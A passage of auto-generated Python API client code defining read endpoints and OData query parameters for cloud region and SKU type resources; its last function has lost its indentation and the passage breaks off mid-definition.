    """Read a 'cloud.Regions' resource. # noqa: E501
    Synchronous by default; pass async_req=True for an asynchronous
    request, in which case a thread object is returned.
    >>> thread = api.get_cloud_regions_list(async_req=True)
    >>> result = thread.get()
    Keyword Args:
        filter (str): OData $filter predicate selecting the entries to return. [optional]
        orderby (str): Properties used to sort the collection. [optional]
        top (int): Maximum number of resources to return. [optional]
        skip (int): Number of resources to skip in the response. [optional]
        select (str): Subset of properties to return. [optional]
        expand (str): Additional attributes or related resources to include. [optional]
        apply (str): Aggregation/groupby transformations to apply. [optional]
        count (bool): Return only the count of matching resources. [optional]
        inlinecount (str): Request an inline count with the results. [optional]
        at (str): Filter on versioning information properties. [optional]
        tags (str): Request a summary of Tag utilization. [optional]
        _return_http_data_only (bool): Return the response body without
            status code and headers. Default is True.
        _preload_content (bool): If False, return the raw
            urllib3.HTTPResponse without reading/decoding the body.
            Default is True.
        _request_timeout (float/tuple): Total request timeout, or a
            (connection, read) pair of timeouts. Default is None.
        _check_input_type (bool): Type-check data sent to the server.
            Default is True.
        _check_return_type (bool): Type-check data received from the
            server. Default is True.
        _host_index (int/None): Index of the server to use. Default is
            read from the configuration.
        async_req (bool): Execute the request asynchronously.
    Returns:
        CloudRegionsResponse
        If the method is called asynchronously, returns the request
        thread.
    """
    # Fill in the client-control options without clobbering caller values.
    for option, default in (
        ('async_req', False),
        ('_return_http_data_only', True),
        ('_preload_content', True),
        ('_request_timeout', None),
        ('_check_input_type', True),
        ('_check_return_type', True),
        ('_host_index', None),
    ):
        kwargs[option] = kwargs.get(option, default)
    return self.call_with_http_info(**kwargs)
# Endpoint descriptor for GET /api/v1/cloud/Regions.
# Binds the private implementation above as a public callable attribute and
# declares how the OData-style query parameters are validated and serialized.
self.get_cloud_regions_list = _Endpoint(
    settings={
        'response_type': (CloudRegionsResponse,),
        'auth': [
            'cookieAuth',
            'http_signature',
            'oAuth2',
            'oAuth2'  # NOTE(review): duplicate entry emitted by the generator; harmless
        ],
        'endpoint_path': '/api/v1/cloud/Regions',
        'operation_id': 'get_cloud_regions_list',
        'http_method': 'GET',
        'servers': None,
    },
    params_map={
        # Every query parameter accepted by this operation.
        'all': [
            'filter',
            'orderby',
            'top',
            'skip',
            'select',
            'expand',
            'apply',
            'count',
            'inlinecount',
            'at',
            'tags',
        ],
        'required': [],
        'nullable': [
        ],
        # Parameters restricted to the 'allowed_values' sets below.
        'enum': [
            'inlinecount',
        ],
        'validation': [
        ]
    },
    root_map={
        'validations': {
        },
        'allowed_values': {
            ('inlinecount',): {
                "ALLPAGES": "allpages",
                "NONE": "none"
            },
        },
        # Python-side types used for input type checking.
        'openapi_types': {
            'filter':
                (str,),
            'orderby':
                (str,),
            'top':
                (int,),
            'skip':
                (int,),
            'select':
                (str,),
            'expand':
                (str,),
            'apply':
                (str,),
            'count':
                (bool,),
            'inlinecount':
                (str,),
            'at':
                (str,),
            'tags':
                (str,),
        },
        # Python parameter name -> wire name (OData params carry a '$' prefix).
        'attribute_map': {
            'filter': '$filter',
            'orderby': '$orderby',
            'top': '$top',
            'skip': '$skip',
            'select': '$select',
            'expand': '$expand',
            'apply': '$apply',
            'count': '$count',
            'inlinecount': '$inlinecount',
            'at': 'at',
            'tags': 'tags',
        },
        # All parameters of this operation travel in the query string.
        'location_map': {
            'filter': 'query',
            'orderby': 'query',
            'top': 'query',
            'skip': 'query',
            'select': 'query',
            'expand': 'query',
            'apply': 'query',
            'count': 'query',
            'inlinecount': 'query',
            'at': 'query',
            'tags': 'query',
        },
        'collection_format_map': {
        }
    },
    headers_map={
        'accept': [
            'application/json',
            'text/csv',
            'application/vnd.openxmlformats-officedocument.spreadsheetml.sheet'
        ],
        'content_type': [],
    },
    api_client=api_client,
    callable=__get_cloud_regions_list
)
def __get_cloud_sku_container_type_by_moid(
    self,
    moid,
    **kwargs
):
    """Read a 'cloud.SkuContainerType' resource. # noqa: E501
    Synchronous by default; pass async_req=True for an asynchronous
    request, in which case a thread object is returned.
    >>> thread = api.get_cloud_sku_container_type_by_moid(moid, async_req=True)
    >>> result = thread.get()
    Args:
        moid (str): The unique Moid identifier of a resource instance.
    Keyword Args:
        _return_http_data_only (bool): Return the response body without
            status code and headers. Default is True.
        _preload_content (bool): If False, return the raw
            urllib3.HTTPResponse without reading/decoding the body.
            Default is True.
        _request_timeout (float/tuple): Total request timeout, or a
            (connection, read) pair of timeouts. Default is None.
        _check_input_type (bool): Type-check data sent to the server.
            Default is True.
        _check_return_type (bool): Type-check data received from the
            server. Default is True.
        _host_index (int/None): Index of the server to use. Default is
            read from the configuration.
        async_req (bool): Execute the request asynchronously.
    Returns:
        CloudSkuContainerType
        If the method is called asynchronously, returns the request
        thread.
    """
    # Fill in the client-control options without clobbering caller values.
    for option, default in (
        ('async_req', False),
        ('_return_http_data_only', True),
        ('_preload_content', True),
        ('_request_timeout', None),
        ('_check_input_type', True),
        ('_check_return_type', True),
        ('_host_index', None),
    ):
        kwargs[option] = kwargs.get(option, default)
    # The path parameter is forwarded through kwargs like everything else.
    kwargs['moid'] = moid
    return self.call_with_http_info(**kwargs)
# Endpoint descriptor for GET /api/v1/cloud/SkuContainerTypes/{Moid}.
# Binds the private implementation above as a public callable attribute and
# declares the required 'moid' path parameter.
self.get_cloud_sku_container_type_by_moid = _Endpoint(
    settings={
        'response_type': (CloudSkuContainerType,),
        'auth': [
            'cookieAuth',
            'http_signature',
            'oAuth2',
            'oAuth2'  # NOTE(review): duplicate entry emitted by the generator; harmless
        ],
        'endpoint_path': '/api/v1/cloud/SkuContainerTypes/{Moid}',
        'operation_id': 'get_cloud_sku_container_type_by_moid',
        'http_method': 'GET',
        'servers': None,
    },
    params_map={
        'all': [
            'moid',
        ],
        'required': [
            'moid',
        ],
        'nullable': [
        ],
        'enum': [
        ],
        'validation': [
        ]
    },
    root_map={
        'validations': {
        },
        'allowed_values': {
        },
        'openapi_types': {
            'moid':
                (str,),
        },
        # Python name -> wire name used in the URL template.
        'attribute_map': {
            'moid': 'Moid',
        },
        'location_map': {
            'moid': 'path',
        },
        'collection_format_map': {
        }
    },
    headers_map={
        'accept': [
            'application/json',
            'text/csv',
            'application/vnd.openxmlformats-officedocument.spreadsheetml.sheet'
        ],
        'content_type': [],
    },
    api_client=api_client,
    callable=__get_cloud_sku_container_type_by_moid
)
def __get_cloud_sku_container_type_list(
    self,
    **kwargs
):
    """Read a 'cloud.SkuContainerType' resource.  # noqa: E501

    Synchronous by default; pass async_req=True to run asynchronously,
    in which case a request thread is returned and thread.get() yields
    the result.

    Keyword Args:
        filter (str): OData-style $filter expression selecting which
            resources to return. [optional] server default ""
        orderby (str): properties used to sort the collection. [optional]
        top (int): maximum number of resources to return. [optional]
            server default 100
        skip (int): number of resources to skip. [optional] server default 0
        select (str): subset of properties to return. [optional]
            server default ""
        expand (str): additional attributes or related resources to
            include. [optional]
        apply (str): $apply aggregation/groupby transformations. [optional]
        count (bool): return only the count of matching resources. [optional]
        inlinecount (str): request an inline count with the response.
            [optional] server default "allpages"
        at (str): like $filter, but over versioning properties. [optional]
        tags (str): request a summary of Tag utilization. [optional]
        _return_http_data_only (bool): return only the body, without
            status code and headers. Default is True.
        _preload_content (bool): if False, return the raw
            urllib3.HTTPResponse without reading/decoding. Default is True.
        _request_timeout (float/tuple): total request timeout, or a
            (connection, read) pair. Default is None.
        _check_input_type (bool): type-check data sent to the server.
            Default is True.
        _check_return_type (bool): type-check data received from the
            server. Default is True.
        _host_index (int/None): index of the server to use. Default is
            read from the configuration.
        async_req (bool): execute request asynchronously.

    Returns:
        CloudSkuContainerTypeResponse, or the request thread when called
        asynchronously.
    """
    # Apply defaults for the standard call options without overriding
    # anything the caller supplied explicitly.
    for option, fallback in (
        ('async_req', False),
        ('_return_http_data_only', True),
        ('_preload_content', True),
        ('_request_timeout', None),
        ('_check_input_type', True),
        ('_check_return_type', True),
        ('_host_index', None),
    ):
        kwargs[option] = kwargs.get(option, fallback)
    return self.call_with_http_info(**kwargs)
# Endpoint descriptor for GET /api/v1/cloud/SkuContainerTypes.
# Registered as a public attribute so callers invoke it like a method;
# `callable` points at the private implementation defined just above.
self.get_cloud_sku_container_type_list = _Endpoint(
    settings={
        # Responses are deserialized into this model class.
        'response_type': (CloudSkuContainerTypeResponse,),
        'auth': [
            'cookieAuth',
            'http_signature',
            'oAuth2',
            'oAuth2'  # NOTE(review): duplicate scheme entry — generator artifact; confirm harmless
        ],
        'endpoint_path': '/api/v1/cloud/SkuContainerTypes',
        'operation_id': 'get_cloud_sku_container_type_list',
        'http_method': 'GET',
        'servers': None,
    },
    params_map={
        # Every accepted (non-underscore) parameter name.
        'all': [
            'filter',
            'orderby',
            'top',
            'skip',
            'select',
            'expand',
            'apply',
            'count',
            'inlinecount',
            'at',
            'tags',
        ],
        'required': [],
        'nullable': [
        ],
        # Parameters restricted to the values in root_map['allowed_values'].
        'enum': [
            'inlinecount',
        ],
        'validation': [
        ]
    },
    root_map={
        'validations': {
        },
        'allowed_values': {
            ('inlinecount',): {
                "ALLPAGES": "allpages",
                "NONE": "none"
            },
        },
        # Python-side type for each parameter.
        'openapi_types': {
            'filter':
                (str,),
            'orderby':
                (str,),
            'top':
                (int,),
            'skip':
                (int,),
            'select':
                (str,),
            'expand':
                (str,),
            'apply':
                (str,),
            'count':
                (bool,),
            'inlinecount':
                (str,),
            'at':
                (str,),
            'tags':
                (str,),
        },
        # Python name -> wire name (OData options carry a '$' prefix).
        'attribute_map': {
            'filter': '$filter',
            'orderby': '$orderby',
            'top': '$top',
            'skip': '$skip',
            'select': '$select',
            'expand': '$expand',
            'apply': '$apply',
            'count': '$count',
            'inlinecount': '$inlinecount',
            'at': 'at',
            'tags': 'tags',
        },
        # All parameters are sent as query-string options.
        'location_map': {
            'filter': 'query',
            'orderby': 'query',
            'top': 'query',
            'skip': 'query',
            'select': 'query',
            'expand': 'query',
            'apply': 'query',
            'count': 'query',
            'inlinecount': 'query',
            'at': 'query',
            'tags': 'query',
        },
        'collection_format_map': {
        }
    },
    headers_map={
        'accept': [
            'application/json',
            'text/csv',
            'application/vnd.openxmlformats-officedocument.spreadsheetml.sheet'
        ],
        'content_type': [],
    },
    api_client=api_client,
    callable=__get_cloud_sku_container_type_list
)
def __get_cloud_sku_database_type_by_moid(
    self,
    moid,
    **kwargs
):
    """Read a 'cloud.SkuDatabaseType' resource.  # noqa: E501

    Synchronous by default; pass async_req=True to run asynchronously,
    in which case a request thread is returned and thread.get() yields
    the result.

    Args:
        moid (str): The unique Moid identifier of a resource instance.

    Keyword Args:
        _return_http_data_only (bool): return only the body, without
            status code and headers. Default is True.
        _preload_content (bool): if False, return the raw
            urllib3.HTTPResponse without reading/decoding. Default is True.
        _request_timeout (float/tuple): total request timeout, or a
            (connection, read) pair. Default is None.
        _check_input_type (bool): type-check data sent to the server.
            Default is True.
        _check_return_type (bool): type-check data received from the
            server. Default is True.
        _host_index (int/None): index of the server to use. Default is
            read from the configuration.
        async_req (bool): execute request asynchronously.

    Returns:
        CloudSkuDatabaseType, or the request thread when called
        asynchronously.
    """
    # Apply defaults for the standard call options without overriding
    # anything the caller supplied explicitly.
    for option, fallback in (
        ('async_req', False),
        ('_return_http_data_only', True),
        ('_preload_content', True),
        ('_request_timeout', None),
        ('_check_input_type', True),
        ('_check_return_type', True),
        ('_host_index', None),
    ):
        kwargs[option] = kwargs.get(option, fallback)
    kwargs['moid'] = moid
    return self.call_with_http_info(**kwargs)
# Endpoint descriptor for GET /api/v1/cloud/SkuDatabaseTypes/{Moid}.
# Registered as a public attribute so callers invoke it like a method;
# `callable` points at the private implementation defined just above.
self.get_cloud_sku_database_type_by_moid = _Endpoint(
    settings={
        # Responses are deserialized into this model class.
        'response_type': (CloudSkuDatabaseType,),
        'auth': [
            'cookieAuth',
            'http_signature',
            'oAuth2',
            'oAuth2'  # NOTE(review): duplicate scheme entry — generator artifact; confirm harmless
        ],
        'endpoint_path': '/api/v1/cloud/SkuDatabaseTypes/{Moid}',
        'operation_id': 'get_cloud_sku_database_type_by_moid',
        'http_method': 'GET',
        'servers': None,
    },
    params_map={
        'all': [
            'moid',
        ],
        'required': [
            'moid',
        ],
        'nullable': [
        ],
        'enum': [
        ],
        'validation': [
        ]
    },
    root_map={
        'validations': {
        },
        'allowed_values': {
        },
        # Python-side type for each parameter.
        'openapi_types': {
            'moid':
                (str,),
        },
        # Python name -> wire name.
        'attribute_map': {
            'moid': 'Moid',
        },
        # 'moid' is substituted into the {Moid} path segment.
        'location_map': {
            'moid': 'path',
        },
        'collection_format_map': {
        }
    },
    headers_map={
        'accept': [
            'application/json',
            'text/csv',
            'application/vnd.openxmlformats-officedocument.spreadsheetml.sheet'
        ],
        'content_type': [],
    },
    api_client=api_client,
    callable=__get_cloud_sku_database_type_by_moid
)
def __get_cloud_sku_database_type_list(
    self,
    **kwargs
):
    """Read a 'cloud.SkuDatabaseType' resource.  # noqa: E501

    Synchronous by default; pass async_req=True to run asynchronously,
    in which case a request thread is returned and thread.get() yields
    the result.

    Keyword Args:
        filter (str): OData-style $filter expression selecting which
            resources to return. [optional] server default ""
        orderby (str): properties used to sort the collection. [optional]
        top (int): maximum number of resources to return. [optional]
            server default 100
        skip (int): number of resources to skip. [optional] server default 0
        select (str): subset of properties to return. [optional]
            server default ""
        expand (str): additional attributes or related resources to
            include. [optional]
        apply (str): $apply aggregation/groupby transformations. [optional]
        count (bool): return only the count of matching resources. [optional]
        inlinecount (str): request an inline count with the response.
            [optional] server default "allpages"
        at (str): like $filter, but over versioning properties. [optional]
        tags (str): request a summary of Tag utilization. [optional]
        _return_http_data_only (bool): return only the body, without
            status code and headers. Default is True.
        _preload_content (bool): if False, return the raw
            urllib3.HTTPResponse without reading/decoding. Default is True.
        _request_timeout (float/tuple): total request timeout, or a
            (connection, read) pair. Default is None.
        _check_input_type (bool): type-check data sent to the server.
            Default is True.
        _check_return_type (bool): type-check data received from the
            server. Default is True.
        _host_index (int/None): index of the server to use. Default is
            read from the configuration.
        async_req (bool): execute request asynchronously.

    Returns:
        CloudSkuDatabaseTypeResponse, or the request thread when called
        asynchronously.
    """
    # Apply defaults for the standard call options without overriding
    # anything the caller supplied explicitly.
    for option, fallback in (
        ('async_req', False),
        ('_return_http_data_only', True),
        ('_preload_content', True),
        ('_request_timeout', None),
        ('_check_input_type', True),
        ('_check_return_type', True),
        ('_host_index', None),
    ):
        kwargs[option] = kwargs.get(option, fallback)
    return self.call_with_http_info(**kwargs)
# Endpoint descriptor for GET /api/v1/cloud/SkuDatabaseTypes.
# Registered as a public attribute so callers invoke it like a method;
# `callable` points at the private implementation defined just above.
self.get_cloud_sku_database_type_list = _Endpoint(
    settings={
        # Responses are deserialized into this model class.
        'response_type': (CloudSkuDatabaseTypeResponse,),
        'auth': [
            'cookieAuth',
            'http_signature',
            'oAuth2',
            'oAuth2'  # NOTE(review): duplicate scheme entry — generator artifact; confirm harmless
        ],
        'endpoint_path': '/api/v1/cloud/SkuDatabaseTypes',
        'operation_id': 'get_cloud_sku_database_type_list',
        'http_method': 'GET',
        'servers': None,
    },
    params_map={
        # Every accepted (non-underscore) parameter name.
        'all': [
            'filter',
            'orderby',
            'top',
            'skip',
            'select',
            'expand',
            'apply',
            'count',
            'inlinecount',
            'at',
            'tags',
        ],
        'required': [],
        'nullable': [
        ],
        # Parameters restricted to the values in root_map['allowed_values'].
        'enum': [
            'inlinecount',
        ],
        'validation': [
        ]
    },
    root_map={
        'validations': {
        },
        'allowed_values': {
            ('inlinecount',): {
                "ALLPAGES": "allpages",
                "NONE": "none"
            },
        },
        # Python-side type for each parameter.
        'openapi_types': {
            'filter':
                (str,),
            'orderby':
                (str,),
            'top':
                (int,),
            'skip':
                (int,),
            'select':
                (str,),
            'expand':
                (str,),
            'apply':
                (str,),
            'count':
                (bool,),
            'inlinecount':
                (str,),
            'at':
                (str,),
            'tags':
                (str,),
        },
        # Python name -> wire name (OData options carry a '$' prefix).
        'attribute_map': {
            'filter': '$filter',
            'orderby': '$orderby',
            'top': '$top',
            'skip': '$skip',
            'select': '$select',
            'expand': '$expand',
            'apply': '$apply',
            'count': '$count',
            'inlinecount': '$inlinecount',
            'at': 'at',
            'tags': 'tags',
        },
        # All parameters are sent as query-string options.
        'location_map': {
            'filter': 'query',
            'orderby': 'query',
            'top': 'query',
            'skip': 'query',
            'select': 'query',
            'expand': 'query',
            'apply': 'query',
            'count': 'query',
            'inlinecount': 'query',
            'at': 'query',
            'tags': 'query',
        },
        'collection_format_map': {
        }
    },
    headers_map={
        'accept': [
            'application/json',
            'text/csv',
            'application/vnd.openxmlformats-officedocument.spreadsheetml.sheet'
        ],
        'content_type': [],
    },
    api_client=api_client,
    callable=__get_cloud_sku_database_type_list
)
def __get_cloud_sku_instance_type_by_moid(
    self,
    moid,
    **kwargs
):
    """Read a 'cloud.SkuInstanceType' resource.  # noqa: E501

    Synchronous by default; pass async_req=True to run asynchronously,
    in which case a request thread is returned and thread.get() yields
    the result.

    Args:
        moid (str): The unique Moid identifier of a resource instance.

    Keyword Args:
        _return_http_data_only (bool): return only the body, without
            status code and headers. Default is True.
        _preload_content (bool): if False, return the raw
            urllib3.HTTPResponse without reading/decoding. Default is True.
        _request_timeout (float/tuple): total request timeout, or a
            (connection, read) pair. Default is None.
        _check_input_type (bool): type-check data sent to the server.
            Default is True.
        _check_return_type (bool): type-check data received from the
            server. Default is True.
        _host_index (int/None): index of the server to use. Default is
            read from the configuration.
        async_req (bool): execute request asynchronously.

    Returns:
        CloudSkuInstanceType, or the request thread when called
        asynchronously.
    """
    # Apply defaults for the standard call options without overriding
    # anything the caller supplied explicitly.
    for option, fallback in (
        ('async_req', False),
        ('_return_http_data_only', True),
        ('_preload_content', True),
        ('_request_timeout', None),
        ('_check_input_type', True),
        ('_check_return_type', True),
        ('_host_index', None),
    ):
        kwargs[option] = kwargs.get(option, fallback)
    kwargs['moid'] = moid
    return self.call_with_http_info(**kwargs)
# Endpoint descriptor for GET /api/v1/cloud/SkuInstanceTypes/{Moid}.
# Registered as a public attribute so callers invoke it like a method;
# `callable` points at the private implementation defined just above.
self.get_cloud_sku_instance_type_by_moid = _Endpoint(
    settings={
        # Responses are deserialized into this model class.
        'response_type': (CloudSkuInstanceType,),
        'auth': [
            'cookieAuth',
            'http_signature',
            'oAuth2',
            'oAuth2'  # NOTE(review): duplicate scheme entry — generator artifact; confirm harmless
        ],
        'endpoint_path': '/api/v1/cloud/SkuInstanceTypes/{Moid}',
        'operation_id': 'get_cloud_sku_instance_type_by_moid',
        'http_method': 'GET',
        'servers': None,
    },
    params_map={
        'all': [
            'moid',
        ],
        'required': [
            'moid',
        ],
        'nullable': [
        ],
        'enum': [
        ],
        'validation': [
        ]
    },
    root_map={
        'validations': {
        },
        'allowed_values': {
        },
        # Python-side type for each parameter.
        'openapi_types': {
            'moid':
                (str,),
        },
        # Python name -> wire name.
        'attribute_map': {
            'moid': 'Moid',
        },
        # 'moid' is substituted into the {Moid} path segment.
        'location_map': {
            'moid': 'path',
        },
        'collection_format_map': {
        }
    },
    headers_map={
        'accept': [
            'application/json',
            'text/csv',
            'application/vnd.openxmlformats-officedocument.spreadsheetml.sheet'
        ],
        'content_type': [],
    },
    api_client=api_client,
    callable=__get_cloud_sku_instance_type_by_moid
)
def __get_cloud_sku_instance_type_list(
    self,
    **kwargs
):
    """Read a 'cloud.SkuInstanceType' resource.  # noqa: E501

    Synchronous by default; pass async_req=True to run asynchronously,
    in which case a request thread is returned and thread.get() yields
    the result.

    Keyword Args:
        filter (str): OData-style $filter expression selecting which
            resources to return. [optional] server default ""
        orderby (str): properties used to sort the collection. [optional]
        top (int): maximum number of resources to return. [optional]
            server default 100
        skip (int): number of resources to skip. [optional] server default 0
        select (str): subset of properties to return. [optional]
            server default ""
        expand (str): additional attributes or related resources to
            include. [optional]
        apply (str): $apply aggregation/groupby transformations. [optional]
        count (bool): return only the count of matching resources. [optional]
        inlinecount (str): request an inline count with the response.
            [optional] server default "allpages"
        at (str): like $filter, but over versioning properties. [optional]
        tags (str): request a summary of Tag utilization. [optional]
        _return_http_data_only (bool): return only the body, without
            status code and headers. Default is True.
        _preload_content (bool): if False, return the raw
            urllib3.HTTPResponse without reading/decoding. Default is True.
        _request_timeout (float/tuple): total request timeout, or a
            (connection, read) pair. Default is None.
        _check_input_type (bool): type-check data sent to the server.
            Default is True.
        _check_return_type (bool): type-check data received from the
            server. Default is True.
        _host_index (int/None): index of the server to use. Default is
            read from the configuration.
        async_req (bool): execute request asynchronously.

    Returns:
        CloudSkuInstanceTypeResponse, or the request thread when called
        asynchronously.
    """
    # Apply defaults for the standard call options without overriding
    # anything the caller supplied explicitly.
    for option, fallback in (
        ('async_req', False),
        ('_return_http_data_only', True),
        ('_preload_content', True),
        ('_request_timeout', None),
        ('_check_input_type', True),
        ('_check_return_type', True),
        ('_host_index', None),
    ):
        kwargs[option] = kwargs.get(option, fallback)
    return self.call_with_http_info(**kwargs)
# Endpoint descriptor for GET /api/v1/cloud/SkuInstanceTypes.
# Registered as a public attribute so callers invoke it like a method;
# `callable` points at the private implementation defined just above.
self.get_cloud_sku_instance_type_list = _Endpoint(
    settings={
        # Responses are deserialized into this model class.
        'response_type': (CloudSkuInstanceTypeResponse,),
        'auth': [
            'cookieAuth',
            'http_signature',
            'oAuth2',
            'oAuth2'  # NOTE(review): duplicate scheme entry — generator artifact; confirm harmless
        ],
        'endpoint_path': '/api/v1/cloud/SkuInstanceTypes',
        'operation_id': 'get_cloud_sku_instance_type_list',
        'http_method': 'GET',
        'servers': None,
    },
    params_map={
        # Every accepted (non-underscore) parameter name.
        'all': [
            'filter',
            'orderby',
            'top',
            'skip',
            'select',
            'expand',
            'apply',
            'count',
            'inlinecount',
            'at',
            'tags',
        ],
        'required': [],
        'nullable': [
        ],
        # Parameters restricted to the values in root_map['allowed_values'].
        'enum': [
            'inlinecount',
        ],
        'validation': [
        ]
    },
    root_map={
        'validations': {
        },
        'allowed_values': {
            ('inlinecount',): {
                "ALLPAGES": "allpages",
                "NONE": "none"
            },
        },
        # Python-side type for each parameter.
        'openapi_types': {
            'filter':
                (str,),
            'orderby':
                (str,),
            'top':
                (int,),
            'skip':
                (int,),
            'select':
                (str,),
            'expand':
                (str,),
            'apply':
                (str,),
            'count':
                (bool,),
            'inlinecount':
                (str,),
            'at':
                (str,),
            'tags':
                (str,),
        },
        # Python name -> wire name (OData options carry a '$' prefix).
        'attribute_map': {
            'filter': '$filter',
            'orderby': '$orderby',
            'top': '$top',
            'skip': '$skip',
            'select': '$select',
            'expand': '$expand',
            'apply': '$apply',
            'count': '$count',
            'inlinecount': '$inlinecount',
            'at': 'at',
            'tags': 'tags',
        },
        # All parameters are sent as query-string options.
        'location_map': {
            'filter': 'query',
            'orderby': 'query',
            'top': 'query',
            'skip': 'query',
            'select': 'query',
            'expand': 'query',
            'apply': 'query',
            'count': 'query',
            'inlinecount': 'query',
            'at': 'query',
            'tags': 'query',
        },
        'collection_format_map': {
        }
    },
    headers_map={
        'accept': [
            'application/json',
            'text/csv',
            'application/vnd.openxmlformats-officedocument.spreadsheetml.sheet'
        ],
        'content_type': [],
    },
    api_client=api_client,
    callable=__get_cloud_sku_instance_type_list
)
def __get_cloud_sku_network_type_by_moid(
    self,
    moid,
    **kwargs
):
    """Read a 'cloud.SkuNetworkType' resource.  # noqa: E501

    Synchronous by default; pass async_req=True to run asynchronously,
    in which case a request thread is returned and thread.get() yields
    the result.

    Args:
        moid (str): The unique Moid identifier of a resource instance.

    Keyword Args:
        _return_http_data_only (bool): return only the body, without
            status code and headers. Default is True.
        _preload_content (bool): if False, return the raw
            urllib3.HTTPResponse without reading/decoding. Default is True.
        _request_timeout (float/tuple): total request timeout, or a
            (connection, read) pair. Default is None.
        _check_input_type (bool): type-check data sent to the server.
            Default is True.
        _check_return_type (bool): type-check data received from the
            server. Default is True.
        _host_index (int/None): index of the server to use. Default is
            read from the configuration.
        async_req (bool): execute request asynchronously.

    Returns:
        CloudSkuNetworkType, or the request thread when called
        asynchronously.
    """
    # Apply defaults for the standard call options without overriding
    # anything the caller supplied explicitly.
    for option, fallback in (
        ('async_req', False),
        ('_return_http_data_only', True),
        ('_preload_content', True),
        ('_request_timeout', None),
        ('_check_input_type', True),
        ('_check_return_type', True),
        ('_host_index', None),
    ):
        kwargs[option] = kwargs.get(option, fallback)
    kwargs['moid'] = moid
    return self.call_with_http_info(**kwargs)
# Endpoint descriptor for GET /api/v1/cloud/SkuNetworkTypes/{Moid}.
# Registered as a public attribute so callers invoke it like a method;
# `callable` points at the private implementation defined just above.
self.get_cloud_sku_network_type_by_moid = _Endpoint(
    settings={
        # Responses are deserialized into this model class.
        'response_type': (CloudSkuNetworkType,),
        'auth': [
            'cookieAuth',
            'http_signature',
            'oAuth2',
            'oAuth2'  # NOTE(review): duplicate scheme entry — generator artifact; confirm harmless
        ],
        'endpoint_path': '/api/v1/cloud/SkuNetworkTypes/{Moid}',
        'operation_id': 'get_cloud_sku_network_type_by_moid',
        'http_method': 'GET',
        'servers': None,
    },
    params_map={
        'all': [
            'moid',
        ],
        'required': [
            'moid',
        ],
        'nullable': [
        ],
        'enum': [
        ],
        'validation': [
        ]
    },
    root_map={
        'validations': {
        },
        'allowed_values': {
        },
        # Python-side type for each parameter.
        'openapi_types': {
            'moid':
                (str,),
        },
        # Python name -> wire name.
        'attribute_map': {
            'moid': 'Moid',
        },
        # 'moid' is substituted into the {Moid} path segment.
        'location_map': {
            'moid': 'path',
        },
        'collection_format_map': {
        }
    },
    headers_map={
        'accept': [
            'application/json',
            'text/csv',
            'application/vnd.openxmlformats-officedocument.spreadsheetml.sheet'
        ],
        'content_type': [],
    },
    api_client=api_client,
    callable=__get_cloud_sku_network_type_by_moid
)
def __get_cloud_sku_network_type_list(
self,
**kwargs
):
"""Read a 'cloud.SkuNetworkType' resource. # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.get_cloud_sku_network_type_list(async_req=True)
>>> result = thread.get()
Keyword Args:
filter (str): Filter criteria for the resources to return. A URI with a $filter query option identifies a subset of the entries from the Collection of Entries. The subset is determined by selecting only the Entries that satisfy the predicate expression specified by the $filter option. The expression language that is used in $filter queries supports references to properties and literals. The literal values can be strings enclosed in single quotes, numbers and boolean values (true or false).. [optional] if omitted the server will use the default value of ""
orderby (str): Determines what properties are used to sort the collection of resources.. [optional]
top (int): Specifies the maximum number of resources to return in the response.. [optional] if omitted the server will use the default value of 100
skip (int): Specifies the number of resources to skip in the response.. [optional] if omitted the server will use the default value of 0
select (str): Specifies a subset of properties to return.. [optional] if omitted the server will use the default value of ""
expand (str): Specify additional attributes or related resources to return in addition to the primary resources.. [optional]
apply (str): Specify one or more transformation operations to perform aggregation on the resources. The transformations are processed in order with the output from a transformation being used as input for the subsequent transformation. The \"$apply\" query takes a sequence of set transformations, separated by forward slashes to express that they are consecutively applied, i.e. the result of each transformation is the input to the next transformation. Supported aggregation methods are \"aggregate\" and \"groupby\". The **aggregate** transformation takes a comma-separated list of one or more aggregate expressions as parameters and returns a result set with a single instance, representing the aggregated value for all instances in the input set. The **groupby** transformation takes one or two parameters and 1. Splits the initial set into subsets where all instances in a subset have the same values for the grouping properties specified in the first parameter, 2. Applies set transformations to each subset according to the second parameter, resulting in a new set of potentially different structure and cardinality, 3. Ensures that the instances in the result set contain all grouping properties with the correct values for the group, 4. Concatenates the intermediate result sets into one result set. A groupby transformation affects the structure of the result set.. [optional]
count (bool): The $count query specifies the service should return the count of the matching resources, instead of returning the resources.. [optional]
inlinecount (str): The $inlinecount query option allows clients to request an inline count of the matching resources included with the resources in the response.. [optional] if omitted the server will use the default value of "allpages"
at (str): Similar to \"$filter\", but \"at\" is specifically used to filter versioning information properties for resources to return. A URI with an \"at\" Query Option identifies a subset of the Entries from the Collection of Entries identified by the Resource Path section of the URI. The subset is determined by selecting only the Entries that satisfy the predicate expression specified by the query option. The expression language that is used in at operators supports references to properties and literals. The literal values can be strings enclosed in single quotes, numbers and boolean values (true or false) or any of the additional literal representations shown in the Abstract Type System section.. [optional]
tags (str): The 'tags' parameter is used to request a summary of the Tag utilization for this resource. When the 'tags' parameter is specified, the response provides a list of tag keys, the number of times the key has been used across all documents, and the tag values that have been assigned to the tag key.. [optional]
_return_http_data_only (bool): response data without head status
code and headers. Default is True.
_preload_content (bool): if False, the urllib3.HTTPResponse object
will be returned without reading/decoding response data.
Default is True.
_request_timeout (float/tuple): timeout setting for this request. If one
number provided, it will be total request timeout. It can also
be a pair (tuple) of (connection, read) timeouts.
Default is None.
_check_input_type (bool): specifies if type checking
should be done one the data sent to the server.
Default is True.
_check_return_type (bool): specifies if type checking
should be done one the data received from the server.
Default is True.
_host_index (int/None): specifies the index of the server
that we want to use.
Default is read from the configuration.
async_req (bool): execute request asynchronously
Returns:
CloudSkuNetworkTypeResponse
If the method is called asynchronously, returns the request
thread.
"""
kwargs['async_req'] = kwargs.get(
'async_req', False
)
kwargs['_return_http_data_only'] = kwargs.get(
'_return_http_data_only', True
)
kwargs['_preload_content'] = kwargs.get(
'_preload_content', True
)
kwargs['_request_timeout'] = kwargs.get(
'_request_timeout', None
)
kwargs['_check_input_type'] = kwargs.get(
'_check_input_type', True
)
kwargs['_check_return_type'] = kwargs.get(
'_check_return_type', True
)
kwargs['_host_index'] = kwargs.get('_host_index')
return self.call_with_http_info(**kwargs)
self.get_cloud_sku_network_type_list = _Endpoint(
settings={
'response_type': (CloudSkuNetworkTypeResponse,),
'auth': [
'cookieAuth',
'http_signature',
'oAuth2',
'oAuth2'
],
'endpoint_path': '/api/v1/cloud/SkuNetworkTypes',
'operation_id': 'get_cloud_sku_network_type_list',
'http_method': 'GET',
